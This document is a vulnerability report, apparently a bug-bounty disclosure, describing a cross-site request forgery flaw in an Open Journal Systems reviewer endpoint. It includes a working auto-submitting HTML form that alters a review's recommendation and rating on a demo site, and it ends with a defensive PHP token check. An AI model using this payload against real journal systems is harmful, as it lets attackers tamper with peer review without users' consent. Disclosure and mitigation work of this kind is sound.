Description
CSRF in Review Details
Proof of Concept
1. The attacker sends a fake form to the user
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/users/reviewer/reviewer-grid/review-read">
<input type="hidden" name="csrfToken" value="" />
<input type="hidden" name="reviewAssignmentId" value="12" />
<input type="hidden" name="submissionId" value="697" />
<input type="hidden" name="stageId" value="3" />
<input type="hidden" name="recommendation" value="2" />
<input type="hidden" name="quality" value="2" />
<input type="hidden" name="submitFormButton" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2. The user clicks, and the Recommendation and Reviewer rating are changed without the user wanting it
Video PoC
https://drive.google.com/file/d/1jUapGuHL1vR173QqXCdTGxybLXgbG99M/view?usp=sharing
Payload PoC
https://drive.google.com/file/d/11Xob6yqU12MEpK1aJVWRIJi5-3aduVu5/view?usp=sharing
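
The request in the proof of concept arrives as a GET (the form has no method attribute) with an empty csrfToken. The following is an added example of a server-side check that rejects it, not code from this report or from OJS; the function names and the session layout are hypothetical, and the sample requests are constructed from the form fields above.

```php
<?php
declare(strict_types=1);
// Hypothetical helper names; this is not OJS/PKP code.

/** Create (or reuse) the CSRF token bound to this session. */
function csrf_token_for(array &$session): string
{
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

/** Decide whether a state-changing request may proceed: [allowed, reason]. */
function check_state_change(string $method, array $params, array $session): array
{
    // State changes must not be reachable through GET: a link, an image
    // tag or a form without a method attribute all produce a GET.
    if (strtoupper($method) !== 'POST') {
        return [false, 'method not allowed'];
    }
    $expected = $session['csrfToken'] ?? '';
    $supplied = $params['csrfToken'] ?? '';
    // An empty or missing token on either side is never a match.
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return [false, 'missing CSRF token'];
    }
    // Constant-time comparison against the token bound to the session.
    if (!hash_equals($expected, $supplied)) {
        return [false, 'invalid CSRF token'];
    }
    return [true, 'ok'];
}

// Constructed sample data mirroring the fields of the form above.
$session = [];
$token = csrf_token_for($session);
$fields = ['reviewAssignmentId' => '12', 'submissionId' => '697',
           'stageId' => '3', 'recommendation' => '2', 'quality' => '2'];
$cases = [
    'cross-site: GET, empty token'  => ['GET',  $fields + ['csrfToken' => '']],
    'cross-site: POST, empty token' => ['POST', $fields + ['csrfToken' => '']],
    'cross-site: POST, wrong token' => ['POST', $fields + ['csrfToken' => str_repeat('0', 64)]],
    'genuine: POST, session token'  => ['POST', $fields + ['csrfToken' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    [$ok, $reason] = check_state_change($method, $params, $session);
    printf("%-32s %s (%s)\n", $label, $ok ? 'ALLOW' : 'DENY', $reason);
}
```

Only the last case is allowed; the other three are denied before any review data would be touched.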